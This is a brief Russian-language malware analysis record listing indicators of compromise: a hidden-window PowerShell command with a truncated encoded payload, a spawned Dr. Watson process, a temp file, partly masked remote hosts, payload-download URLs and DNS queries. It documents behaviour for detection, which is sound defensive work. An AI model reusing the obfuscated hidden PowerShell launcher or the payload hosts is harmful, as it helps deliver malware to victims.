Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHMAZgB6AGUAeABzAGsAdAB0AHMAZgBpAD0AJwBLAGIAegBsAGYAZgB2AGYAJwA7ACQAVQBuAGoAdgB0AGMAbABiAGYAaQBwACAAPQAgACcAMgAyADIAJwA7ACQATABtAHMAZABwAHcAcgBxAHQAdQA9ACcAWABwAHUAZQBiAHQAcQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\937753.cvr
- 'pa#####bat.lipi.go.id':80
- 'pb#.##sisdev.info':80
- 'pn######.dev.webdoodle.com.au':443
- 'in#####ion4crisis.org':443
- http://pa#####bat.lipi.go.id/calendar/o04/
- http://pb#.##sisdev.info/wp-content/uploads/OBv44RS/
- 'pn######.dev.webdoodle.com.au':443
- DNS ASK ua#.###yquakewith.us
- DNS ASK pa#####bat.lipi.go.id
- DNS ASK pb#.##sisdev.info
- DNS ASK pn######.dev.webdoodle.com.au
- DNS ASK in#####ion4crisis.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHMAZgB6AGUAeABzAGsAdAB0AHMAZgBpAD0AJwBLAGIAegBsAGYAZgB2AGYAJwA7ACQAVQBuAGoAdgB0AGMAbABiAGYAaQBwACAAPQAgACcAMgAyADIAJwA7ACQATABtAHMAZABwAHcAcgBxAHQAdQA9ACcAWABwAHUAZQBiAHQAcQB...' (со скрытым окном)